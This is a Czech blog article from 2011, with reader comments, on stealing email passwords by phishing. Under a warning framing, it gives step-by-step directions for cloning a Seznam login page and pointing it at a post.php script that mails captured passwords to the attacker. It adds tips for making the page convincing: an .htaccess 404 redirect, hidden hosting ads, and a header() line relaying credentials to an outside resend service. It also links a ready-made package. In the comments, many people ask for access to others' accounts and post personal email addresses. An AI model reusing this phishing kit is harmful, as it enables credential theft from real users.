Hacknutí hesla na e-mail - sociotechnika || na co dávat pozor?
Pomůžete mi hacknout heslo na email? Častá otázka s kterou se setkávám častěji a častěji, přiblížením jednoho z mnoha způsobů "hacknutí" e-mailu bych rád ukázal na jednoduchost a tím vás varoval na chyby, které mnozí z vás dělají. Popíšem si útok sociotechnika...
Aktualizováno 11.12.2011
"Jen dvě věci na světě jsou nekonečné...Vesmír a lidská hloupost...Tím prvním si ovšem nejsem jist..." Albert Einstein
Budem brát v úvahu, že útočník si vezme prohlášení pana Alberta jako radu a hlouposti lidí (hlouposti vaší) využije. Útok na váš email tedy může probíhat takto: kliknete na odkaz, zobrazí se výzva k přihlášení, přihlásíte se a čtete obsah stránek. VAŠE HESLO BYLO PROZRAZENO!
Hesla typu "Q.q!SaW_2" jsou zbytečná!
- stažená přihlašovací stránka (poslouží k vytvoření fake kopie)
- šikovně zvolená doména (klidně i druhého řádu, ovšem přesvědčivost klesá)
- základní znalost php a html (bo bezmyšlenkové stažení níže uvedených kodů :o) lol)
- šikovnost a využití vaší hlouposti
Co útočníkovi stačí:
Jak bude postupovat:
- jde na přihlašovací stránku a stáhne ji podobně jako na obrázku
- vytvoří si soubor například post.php a do něj vloží script, který zpracuje přijaté informace z kopie a odešle je například na email, script může vypadat třebas takto - zde
- otevře si zdrojový kod stažené stránky s loginem a upraví hodnotu atributu action="neco" na action="post.php" viz. obrázek
- nyní má post.php, složku souborů která vznikla stažením přihlašovací stránky a samotnou přihlašovací stránku
- přihlásí se na svůj hosting (například na wz.cz ) a soubory tam uploaduje
- nyní když zadá adresu která mu tímto vznikne www.jehohosting.cz/prihlasovacistranka.htm načte se klasické přihlášení, s tím rozdílem že zadaná hesla odesílá na email a poté přesměrovává na originální stránku...
- takový odkaz pak může poslat pomocí fake maileru nebo icq
Pár tipů
Umístěním .htaccess s tímto řádkem (umístění musí být v adresáři s login.html) docílíte zobrazení stránky i při "špatně zadané" url. Využití může být pro modifikaci url k zvýšení důvěryhodnosti.
ErrorDocument 404 /login.html
Dále třeba zobrazení reklamy na freehostingu může být nepříjemná věc, stránka pak na první pohled není reálná. Porušení pravidel freehostingů, ale skrytí reklamy dosáhnete umístěním reklamy do tagů div a pomocí css nastavíte display: none. Příklad:
<div style="display: none;"><!--reklama--></div>
Pokud chcete aby bylo přihlašování na fake webu funkční, můžete využít projektu GET2POST a v souboru send.php namísto přesměrování zaslat správné údaje ke skutečnému zpracování. V ukazkových souborech stačí nahradit řádek začínající header tímto:
header("location: http://www.soom.cz/projects/get2post/resend.php?username=".$user."&password=".$pass."&
login=p%C5%99ihl%C3%A1sit+se&serviceid=email&disablessl=0&forcessl=0&lang=cz&logintype=seznam&
returnurl=http%3A%2F%2Femail.seznam.cz%2Fticket&forcerelogin=0&coid=
&uri=https%3A%2F%2Flogin.szn.cz%2FloginProcess&domain=".$dom);
Jak se bránit? Stačí dodržovat tyto zásady:
- neklikejte na odkazy příchozí z neznámých adres a čísel
- neklikejte na odkazy které mají podivnou url
- zbystřete jestliže po vás odkaz vyžaduje heslo
- čtěte url a uvažujte
- pozor! nepřihlašujte se na veřejných terminálech (přesměrování například pomoci FuckDNS)
Odkazy
Testovací balík s připravenými soubory pro hesla seznamu (obsahuje v post.php řádek, starající se o informování napadeného uživatele!): zde
Vše slouží k prostudování hrozby přicházející z této strany, vaše počínání jde mimo mou osobu a veškerou odpovědnost tím berete na sebe! Zneužití je trestné!
Autor:  KdoSiOdJinud / Jan KuthanVydáno: 11.12.2011 11:22 Přečteno: 69702x |
Jak mi přišel spam na lide.cz :o) - už i tam? Nastavení soukromí na FB - ty můžeš a ty zase ne! Jarní prázdniny 2009 - kdy jsou u vás? Video z youtube snadno a jednoduše! |
Komentáře
Zasílate odpověď ke stávajícímu příspěvku (zrušit).
prosím mohl by někdo zistit heslo na email viktor.cizek@email.cz ???? prosim o zaslani hesla na cizek.viktor@seznam.cz
Prosím o pomoc Získání hesla k mému emailu burdycha@seznam.cz do kterého se mi někdo naboural a vše změnil.Nabízím odměnu. Kontakt na email manželky lenka.krpalkova@seznam.cz
Prosím najde se někdo, kdo mi zjistí heslo k e-mailu na seznamu? Můžeme dohodnout i odměnu..napište na pepan.30@seznam.cz, děkuji..spěchá
Zkuste to tady: induk@centrum.cz, myslim, ze se dockate pomoci
induk@centrum.cz
Ahojky, prosím potřebovala bych zjistit heslo na jeden e-mail, popřípadě ti ho zašlu, když se ozveš. Odpověď na e-mail montenegro123456789@seznam.cz
Předem děkuji
Kdokoliv, kdo by mi zkusil pomoci dostat se na Facebook Maty Bastl?
pište na drak693@gmail.com
Je tu někdo kdo mi zjistí heslo na centrumu. Pokud ano ozvěte se na vasek235@gmail.com Díky
odepsal ti někdo? už mám pocit, že jsou to jen řeči, že se dá získat heslo na email
napiš na viktorrkav@seznam.cz
omyl na viktorkav@seznam.cz
jestli je zde někdo, kdo dokáže zjistit heslo na nmail na seznamu, at se ozve na novotneho-lavka@seznam.cz. Dík
Ahoj lidi, potřebuji se dostat na mail: gwynn@centrum.cz. Pomůžete mi někdo, moc díky. Piště na desti123@centrum.cz
kašle te na to nic nechci
Potrebujem vedet heslo,...... chanselize@seznam.cz ps:nutne
Chápu, že chtít se dostat do mailu někomu cizímu je trestné, ale co mám dělat v případě, že se někdo takový dostal zrovna na můj mail, kde mám například adresu, číslo účtu a jiné informace, které je možné zneužít. Po změnění původního hesla a ověřovací otázky si může člověk hodit leda tak mašli. Mám své zkušenosti s policíí, těm je to svým způsobem šumák. Docela mě mrzí, že na tohle třeba Seznam.cz nemá nějakou metodu, jak rychle vyřešit takovou situaci. Například sdělení původního hesla, původní ověřovací otázky a poslat třeba sms zprávu na mobilní telefon uživatele, zda souhlasí...
m a t y a s . x @ s e z n a m . c z
díky chlape, konečně někdo schopnej
kdo má zájem pište na matyXXXXX@seznam.cz
třeba pomůžu. Omlouvám se těm, u kterých se to nepovedlo, ale proč hned někoho špiníte ...
//editoval kdosiodjinud (stejně jako jsem smazal adresu z narážky na tebe, mažu i tvojí - navíc se vystavuješ stíhání za porušování listovního tajemství, pozor na to)
MatyXXXXXXX@seznam.cz je podvodník...pozor, zítra ho jdu nahlásit na policii
//editoval KdoSiOdJinud (bez emailu)
pokechacker že nemožné?? cha cha chaaaa ňaabe!
pokechacker -- Vytvoření např. identické stránky jako je seznam ti nic neříká?? a postupovat xxxxxx (to už nepovím).
Neříkej NEMOŽNÉ, když nevíš
o phishingových stránkách se dozvíš i tu na webu, ale osobně phishing neberu jako hacking, ale jen jako způsob jak přijít/získat heslo. :)
QIP, ICQ, Email, Soc. sítě. Není problém!
Stačí vyplnit dotazník http://jaklehke.wufoo.com/forms/adost/
Prosím pomohol by si mi :(
Potřebuji heslo na e-mail, centrum.cz . Děkuji. V.
Ahoj, potřebovala bych zjistit heslo na mail na seznamu..
napiš na muj \"nahradní\" mail zmrdecek987@seznam.cz
diky :)
POZOR NA MATYASE.X - JE TO PODVODNÍK !!!!! Nabízí zjištění hesla.......
čitam tu vela komentárov a vela ludi chce abi bilo hecknuty email na seznam.cz (nemožné) a ak niekto povie ze heckol shranku na seznam.cz tak rikam ses boh!! pretoze takze zabezpecenie nema ani banka vo svajci ;)
Ja som tes skusal vela krat hecknut seznam.cz koli uctom na hrach ale beznadejne zabezpecenie 99,99%
to slovo "nemožné" bych si dovolil zpochybnit. Tu a tam se najdou (většinou po updatech služby) zranitelnosti. Příkladem těchto chyb může být report na přátelském portále soom.cz viz. link www.soom.cz/index.php?name=seznambt/main
Jde o speciální kategorii bugtracku vyhrazenou pro seznam.cz, jinak obecně seznam.cz podporuje zvídavé lidi a nebrání se pokusům o hacking (tzv. white hat) na základě kterého dochází k zlepšování služeb.
pomohol by si sa my heknut na hru grepolis ???
Halo tak my niekto pomoze heknut na grepolis a zisakt heslo pls :( Matyas pisal som ti na email odpis pls a kto to vie to zrobit napiste my na tetris123@centrum.sk